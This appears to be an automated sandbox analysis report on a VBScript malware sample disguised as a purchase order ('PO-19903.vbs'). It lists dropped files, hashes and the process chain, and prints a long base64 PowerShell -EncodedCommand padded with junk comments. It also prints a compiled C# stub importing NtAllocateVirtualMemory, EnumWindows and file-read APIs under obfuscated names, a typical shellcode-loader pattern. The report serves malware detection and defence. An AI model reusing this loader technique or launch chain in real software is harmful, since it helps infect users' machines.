      SHA-512:B2E5D0FC61FD41F9135960A0B1C602A3129E9C620ABC233476CFCAFAF827205A0A9E50B80920FFA1713D814C749D3D165462FD06C2EEF9F2AFA1F7A9841FDA3D
      Malicious:false
      Reputation:low
      Preview:......h#.a:.4$1..`.,$...ZZ.._1..4...r.@@@@9.u.W.......H;s..e.!.I.$....d.L.G.m.l..:..Z7.XvB.m.!......w.W.M.t....^)\...p*...2|.u....}w.....\.2(.7..F..{....p8...{..z.......c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.].....*../.@..../.ed.b.M`....s...1.....y.+T.T..j.e....R.du...i.2.N{.E...._aZ~...u.W...... :.P.8...V..@(..r%.......B.z....@E.R{ ..n~..@>.o.....B...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..k......qf...M...pPJs...V...m.'1.Z9J.8....%..%...q..*...\..v..b.....!..6.p}.n..9.X...k%....b....r...r.T.36...UJ9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o...........r.b=...A...C..r...J9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o........EI%....7.......r.J.1.....N..b.....!..6.p}.n..9.X...k%.'1.Z9J.8....%..%...q..*...\..v@...E.<...=./..L.Ht......D....F...L...X.(..v.Y+..%.X..r....E*Hn<../bI....7..<.........nf.r.(......G..P.H....]..%.

      C:\Users\user\AppData\Local\Temp\RESA741.tmp

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
      Category:dropped
      Size (bytes):1328
      Entropy (8bit):3.994300931044267
      Encrypted:false
      SSDEEP:24:Hkie9E2gmdQckXhHUaWhKE2mfII+ycuZhNFakSjPNnq9qd:NmdxkxkK1mg1ulFa3Jq9K
      MD5:F65AACFFA87FF3D50E26D4C74F94C373
      SHA1:6A99566969A7B48289D6386F84EF8D4FE349ECA6
      SHA-256:2033A2E3693269ADE25A9E859EACEF47C94FC8D3FEBF878C467FFF4C03763D49
      SHA-512:01FA0DC64D1B7C2F85B481D5B58F8A9E6279C5C56768C781885A841CC15574A686672D6F3B1B158A75D242DE11FE870B3631C38EAC677CE1E6D1E91676ADAE16
      Malicious:false
      Reputation:low
      Preview:L...!o}b.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP...............J.K.R.y...AZ(^...........4.......C:\Users\user\AppData\Local\Temp\RESA741.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.x.o.o.q.y.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0z1jjqw.oai.ps1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxf5m4f4.ld0.psm1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1

      C:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.0798254431067904
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynak7YnqqjPN5Dlq5J:+RI+ycuZhNFakSjPNnqX
      MD5:4AA44B85520779C78689E0415A285E87
      SHA1:1EDE7161C51CF583512BE32B8DF895F7164CD25F
      SHA-256:46E3F9ED1DF836373FB977E8B1594AB433CDE01C35E2EBD4A9EE3FD022E77601
      SHA-512:DE78B379F9F0CA20008090E52BF4EA22F7F3BEFE6C12D95E14508319FB184B4843B3764B5C181642BD14DEF02294E6027E19665A8FA24184C8CE101C240F00C0
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.x.o.o.q.y.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.i.x.o.o.q.y.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

      C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.0.cs

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):889
      Entropy (8bit):5.191875284747735
      Encrypted:false
      SSDEEP:24:JoVSAJt2mRmgkr7NJt29L81RfdafHNQRARU1uRihWRIM:JoVSAJtFmhr7NJtU0RoFQRARbRi4RIM
      MD5:EBEF46122B08728A01A250DF520357D7
      SHA1:D5DB4A89DA7DE1804EF133F7D81D56523044DA4C
      SHA-256:65013DE37A743262C3BEB05B409081A5CA852B93F72CA8CB70C83AAB0CE09F7C
      SHA-512:B81F4DDD72DD4F85AC5E0A0B9D7CBF148D834A89BAF9F4E9AAE8A1116D82E802A95F7FF3EE069500031650D4CFACA0F099DE92791B3E64D82299F39F4D89FAB8
      Malicious:false
      Preview:.using System;..using System.Runtime.InteropServices;..public static class Forly91..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string FABLE,uint Kongehus,int Disvoiceao,int Forly90,int Mainasche,int Moralit1,int TOREADO);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string FABLE,uint Kongehus,int Disvoiceao,int Forly90,int Mainasche,int Moralit1,int TOREADO);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int Forly96,ref Int32 rustninger,int Pointsmenh,ref Int32 Forly9,int WORKSHIPME,int Forly97);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Pointsmenh0,uint Pointsmenh1,IntPtr Pointsmenh2,ref Int32 Pointsmenh3,int Pointsmenh4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Pointsmenh5,int Pointsmenh6);....}

      C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
      Category:dropped
      Size (bytes):369
      Entropy (8bit):5.257421030296142
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fbK/zxs7+AEszIWXp+N23fbK6:p37Lvkmb6KHSWZE8X
      MD5:48693CFB7F38C5B79F86BB3F5751649A
      SHA1:CBCCA55EB411FC67A21719C465522544D1DA95E1
      SHA-256:CF8CE8DDE5D4E150909FA1092194BA7F5C0CFDB3F7C30B2285B032DB336A58C6
      SHA-512:3AECB2BEBAEE3304E1210DF436EAB7DF4BEF6A8432AF3756D870529C708A9469DAC54567CEBF9215E9C89CF889980791B6F7237716AF5DA664F6B490E6B7DC76
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.0.cs"

      C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dll

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):3.269805058908348
      Encrypted:false
      SSDEEP:48:61PS4jyMCkVkEKE6jUoJjhRK1ulFa3Jq:QS8S2AJ3K
      MD5:36507B049F6D91A727D91ADFD1D9C592
      SHA1:EBBA55DCF7DAD9C6A18413787B2E18DB8CEF9AC6
      SHA-256:F6FEDE0CB43711520269A427502ED9FCA305A8E9D773A2612CCDB5A98A39BCC1
      SHA-512:4E8CC020F4C275C7671638BE815985D4C11420F9E0432AEA219CF0D22BAD3B67B5CD9558317F495FE648FA469F96CCF2689D2A32A7C4F168353D433E7776A54F
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... o}b...........!.................%... ...@....... ....................................@.................................p%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P .. ...........................................................BSJB............v4.0.30319......l.......#~..l...,...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................/.(.................~.....~.......................................... 6............ A............ F............ ^.!.......... c.+.......o.....u.....~.......................... ..o.....u.....~.........................

      C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.out

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
      Category:modified
      Size (bytes):867
      Entropy (8bit):5.324821463087829
      Encrypted:false
      SSDEEP:24:KBqd3ka6KHDE8eKaM5DqBVKVrdFAMBJTH:Uika6ADE8eKxDcVKdBJj
      MD5:2EF8BA6AD66210702E42B88920DE0BF4
      SHA1:BACFCEF7CB56A80C16FB6814566E7DB5DE9BAA64
      SHA-256:CF60222670EF82500D1D6743EC94D6D972F2C5215DF4D759215DF8EB0A3447A0
      SHA-512:655105060533B91BF6CE7A0749EEDA10A233EC4CCDE1C17654B06AF2C7F460C62AFB64E7581E9AE94331B3724B50F3789A8B44FD0610EF5DDC64E4D7D5F1D5B6
      Malicious:false
      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

      Static File Info

      General

      File type:ASCII text, with very long lines, with CRLF line terminators
      Entropy (8bit):4.507728980611977
      TrID:
      • Visual Basic Script (13500/0) 100.00%
      File name:PO-19903.vbs
      File size:256870
      MD5:0347b27843d88f73fdcd4dadb95549ac
      SHA1:2a2d6bcd2d83833d501b9695921855e1992f6ec8
      SHA256:1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67
      SHA512:368c6f19dc73693acd0f8c2513489ecb65bc763a6536de22a5421c05aff613191cd51379086765447b74faf28179e1253f7166d85ad9344a7a4be4442f1b9669
      SSDEEP:3072:UCZ+vnIxDSTz1EGYdx3VyZcd4B5RYe/aVPC1C:UCZ+vnWOtPYdLyDRYcaVqI
      TLSH:A544769245B1AFC8D1F839DFCB0D8620B2009D99A2D7F54C9AE211BD7FC72DA531B294
      File Content Preview:'Leaveni MIDLET ABSENTEREN TITTERE Stningssek SMDES SOCIOECON Afgjortele gaidropsar Undenize4 FORR ..'FLISEB kogasinu VALMUER Repac2 RESTA HYPERTRO Facittets6 forespoer Deklarer MATRAL Vier Epigraphe CAPRYLYLF Fintll3 EKSPE Duode Kakkelovn Netdriverw skry

      File Icon

      Icon Hash:e8d69ece869a9ec4

      Network Behavior

      No network behavior found

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:13:30:34
      Start date:12/05/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
      Imagebase:0x7ff6ea8a0000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000000.00000003.585259442.000001AB0D281000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
      Reputation:high

      General

      Target ID:18
      Start time:13:32:58
      Start date:12/05/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQBuACAAYwBoAGUAdgAgAEsAbwByAHAANgAgAHMAdAB0AGUAZAAgAG0AaQBzAGsAcgBlAGQAIAB1AG0AZQBuAG4AZQBzAGsAZQAgAEcAYQBsAG8AcABsAG8AIABVAGQAcwBrAHIAaQB2ADIAIABNAEEARwBOAEUAVABPAE0ARQBUACAAVABSAEkATABMAEkATwBOAFQASAAgAEgAQQBBAFIAQgBSAFMAVABFACAASQBtAG0AYQB0AGMANgAgAGQAcgB1AGUAaAAgAFMAcwBsAGEAIABDAG8AdQBuAHQAcgB5AHIAbwAyACAATgBvAG4AZQB4ACAADQAKACMAQQBsAGkAcwBwAGgAZQBuACAAcwB1AGwAYQAgAGkAZABtAG0AZQBsACAAVAByAGkAYgByAGEAYwAyACAAVABpAGwAZQBnAG4AZQBsACAAVQBuAGQAZQAgAGQAawBzAGQAIAB0AHUAagBhAHMAdQByACAAQwBpAHIAYwA4ACAAQgByAG8AbwAgAEEAcABwAGUAMQAgAE8AawBzAGUAaAB1AGQAZQAgAG4AZQB0AHMAdAByAG8AZQBtACAAVABlAGsAbgBvAGwAbwBnADIAIABrAGwAbwByAGUAIABCAEEATABMAEEARABSACAAVQBOAEYATABVAFQAVABFAFIARQAgAGIAbwB5AGsAbwAgAFQAaQBsAGIAcgBpAG4AZwBlACAAcABoAHkAcwBpACAARgBFAEwAVwBPACAARwBlAG4AZQByAGkAcwBrAHQAdgA1ACAAUwB1AGsAawBlACAATABvAGQAZwBlAGEAcgB0ADMAIAANAAoAIwBVAG4AZQB2AGEAZABhACAARQBuAGMAZQBwAGgAMgAgAHAAbwBsAGUAcgBlAG0AaQAgAHoAYQBrAGEAcgBpAGEAcwBzACAAcwBjAG8AbABsACAAQgBvAGEAdABsADcAIABTAGEAbQBhAHIAIABIAHUAdABjAGgAaQAgAGEAYwBlAHQAYQBuAGkAbwBuACAASQBOAFQARQAgAFMAdAB1AGIAYgAgAGEAbABkAGUAIABMAGEAbQBiAGsAIABOAG8AbgByAGUAdAByAGEAIABTAGsAYQBuAGQAYQBsAGUAaAAgAHAAcgBlAGMAZQBsAGUAYgByAGEAIABQAHIAbwB0AG8AcAByAGUAcwA1ACAAbABpAHYAcwBmAG8AcgBzAGkAIABVAFAAQgBSAEkATQBBAE0AQgAgAFMASABJAFYARQAgAFUAbgBjAGEAMwAgAGsAcgBlAGEAdABpACAASABvAHYAZQBkAGEAZgBzACAAVwB1AGcAZwBsAGkAawAgAA0ACgAjAFUATgBEAEcAQQBBAFIAVABBACAASwBuAHUAZAA3ACAAdAByAGEAcABwAGUAdAByAGkAbgAgAGYAaQByAGUAbQBhAHMAdABlAHIAIABVAE4ASQBOAFQATwBYAEkAIABBAHIAYwBoAGUAIABSAEUARABVACAAbQB5AHgAbwBuACAATQB1AHQAdQBhAGwANQAgAGIAbABvAGsAcgAgAFMAdABpAGwAcwBrACAAQQBpAGcAdQBpAGwAbABlAHMAcQA3ACAAcwBwAGUAdwBpAGUAIABQAGEAcwBrAG8AOAAgAEgAbwB2AGUAZAB0AHIAYQBwACAAUwBpAG8AdQAgAEMAcgBlAGEAdAB1ACAATQB1AGcAZwAgAEEAUgBUAFcATwBSAEsAUwBLAE8AIABSAEEAQQBEAFkAUgBFAE4ARQAgAFAAbwBvAHIAbAA5ACAAQQBkAHYAbwBrAGEAdABmAG8AcgAgAEEAYgBvAHIAdAAyACAAbQBvAHIAcwBlAGwAaQB6AGUAbgAgAA0ACgAjAG8AbQBtAGEAdABpAGQAaQAgAE0AVQBMAEwASQBHAEEATgBTAFUAIABCAGUAbgBlAG4AZAA3ACAAcwBwAHIAagB0AGUAZwBpACAAQwBlAG0AZQBuADcAIABHAGUAbgBlAHIAYQB0AG8AcgBlACAAUwBOAEEAUABTAEUARgAgAEIATwBUAEEATgAgAGkAbgBmAGEAIABGAGEAYQBtAGwAdABtAGUAdAAzACAAZgBpAHMAawBlAHIAawAgAEIAagByAGcAZQByAG4AZQBwACAAUwBhAGIAZQAyACAAQQBrAHQAaQBvACAARQByAGYAdQA3ACAARgB1AHMAaQBvAG4AZQByAGkAMgAgAEwAVQBEAE8AUwBUAEEATgBEACAAQgBBAFQASABPAFIAUwBFAEMAIAByAGUAdgBvACAAcwBhAG4AcwBlAG8AcgAgAEEAZgBzAHQAaQBnADkAIABTAFQAUgBBAEYARgAgAEUAcgBrAGwAcgBpAG4AZwBzAG0AIABBAHIAYgBlAGoAZAAgAFMAcABlAGMAdAA3ACAAUAByAG8AZwByAGEAbQA0ACAASgBPAFUATgBDAEkAIABQAHIAZQBvAHUAdABsACAAYQBzAHQAcgBvAGYAeQBzAGkAIABTAFQARQBOAFoARQBCAFIATgAgAEEAcABwAG8AIABmAGkAbABtAG8AIABLAG8AbQBtAGEAZQByAHMAIAANAAoAIwBBAGIAZAB1AGwAcwB1AGYAMgAgAEMAaQB2AGkAbAA3ACAAQwBhAHIAYQBjAGEAIABIAGUAbQBpAGgAeQBkAHIAbwAgAHAAbwBkAG8AZAB5AG4AaQBhACAAZwBhAGwAYQAgAEgARQBMAE8ARABFAFIATQBXACAAQQB1AGQAaQB0AGkAdgAgAEgATwBNAEUAVwBPAFIAVABGAFIAIAB1AHAAcwByAGkAIABmAGwAZQB1AHIAZQB0AHQAZQByACAAcgBlAG0AYQB0ACAAdQBuAGUAeABjAGUAcgBwAHQAIABTAHAAaQBsAGwAZQByAGUAbAA0ACAASQBOAEQASwAgAEcAcgBhAGQAZABhAGcAcwBoACAAbwBjAHUAbABhACAAQgBhAG4AdABhAG0AdgBnAHQAIABVAG4AZABlACAAVQBvAHAAcwBrAGEAYQByADcAIABMAHkAcwBwAHUAbgBrAHQAZQA1ACAAawBvAG0AbQBhAG4AZABvAGwAIABUAGkAbABiAGEAMgAgAA0ACgAjAFIAZQB2AG4AZQByAG4AZQBwAHIAIABjAG8AbAB1AG0AYgAgAFMAeQBuAGQAIABVAE4ARwBMAE8AQgBVAEwAQQAgAE8AcABkAGUAIABIAGUAaQBrAG8AcwBhAG0AYQAgAEIAYQBhAG4AZAA1ACAAYwBvAHMAdABvAGMAbABhACAAZgBhAG0AaQAgAEgAZQByAHMAYwBoADYAIABUAFIAVQBUAE0AVQBOAEQAIABBAG4AbABpAHMAbQA5ACAATwBMAEkAQgBBAE4AVQBNACAATgBPAE0ASQBOAEEATABOACAASQBsAGQAZgB1AGcAbABzACAAZABpAHIAZQBjAHQAbwAgAFMAaABhAHAAZQAgAFUAcABhAHMAcwBlAGwAaQBnACAAcABhAHIAYQBiAHUAIABXAGgAaQBmAGYAIABEAEkARwBFAEQARQBTACAAUwBrAGEAYQBuAHMAZQBsAHMAbAA0ACAAbwBwAHQAcgBrAGsAZQAgAEUAcgBsAGEAZwB0AGUANwAgAHYAaQBlAGwAcwBlAGEAZgBmACAARgByAGkAbABhAG4AMgAgAFMAZQBkAGEAbgBlACAAUwB5AG4AZQBvAG0AdAB2AGkAcwA5ACAAdQBuAGMAaQBhAGwAcgBlACAASAB2AGEAbABmAGEAIAANAAoAIwBBAHYAaQBzAHMAcABhADcAIABvAGYAZgBiAGUAYQB0AHMAYgAgAEIAcgBpAGcAZwBlAHIAbgBlAHMAIABTAHQAYQBuAGQAYQByAGQAdQA0ACAAVQBOAFMAUABFAEUARAAgAEEAbQBlAHIAaQBjAGEAbgBpACAAQwBZAFMAVABPAEwAIABVAE4AUABFAE4AIABaAGUAdABhADkAIAB1AG4AYwByAHUAbQBwACAARQB1AHIAbwBwADgAIABGAG8AcgBzAHYAYQByADgAIABUAGUAbgBuAGkAcwBmAGkANgAgAEUAdABpAHMAawA1ACAAUwBpAGEAbQBlAHMANQAgAGcAYQBsAGcAZQBuAGYAdQAgAE0AbwB0AGgAZQByAHMAbwBtADYAIABFAHIAZQBtADEAIABLAFkATABMAEkATgAgAEEAbgBkAHIAZQBuAGkAZAAgAHAAaQBzAG8AdABlAGkAbgBjAGwAIABNAGUAdABhAHMAbwBtAGEAcwBpACAASQByAHIAYQB0AGkAbwAgAFYAQQBMAEwATwBOAEUAUgBFAE4AIABTAGsAdQBsAGQAOAAgAEIASQBVAE4ASQBUAFkASwAgAA0ACgAjAEEAZABzAGIAbABvAHIAYwBoAGkANQAgAFEAdQBpAG4AcQB1AGUAIABIAEUATQBJAEMARQAgAHUAZABrAG8AbQBtAGUAIABzAGsAYQByAGwAIABVAFAAUABVAEYARgBOAEUARwBSACAAUABJAE4ARQBTAEEAIABBAFQASABFAFIATwAgAGYAbwByAHkAbgBnACAAdQBuAGMAbwBuAGYAaQBkACAASQBkAG8AbgBlAGkAIABPAHIAdABoAG8AZABvAHgAaQAyACAAcwB0AHkAcgBlACAAYQBmAGQAZABlACAAUwBMAFUAVABUAEUARABFACAADQAKACMARABJAEEAQwBPAE4ASQAgAEsAdgBhAG4AdABpAHQANQAgAHUAbgBkAGYAbAB5AGUAZABlACAAUAByAGEAZQBz